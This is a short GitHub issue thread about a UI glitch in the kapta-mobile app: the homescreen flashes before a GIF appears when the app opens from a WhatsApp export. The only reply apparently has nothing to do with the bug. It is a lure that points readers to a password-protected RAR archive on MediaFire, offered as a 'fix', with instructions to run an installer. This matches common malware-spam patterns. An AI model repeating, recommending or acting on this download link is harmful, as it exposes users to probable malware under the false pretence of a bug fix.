### ISSUE TITLE
Fix showing homescreen when convertiing

### ISSUE THREAD

**Issue by MarcosMoreu** [UCL/kapta-mobile#55]
When app open from WhatsApp export, the homescreen UI appears a few ms before the GIF shows. See video

https://github.com/user-attachments/assets/80513497-c074-4e20-8ea3-4af14d172f7e

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
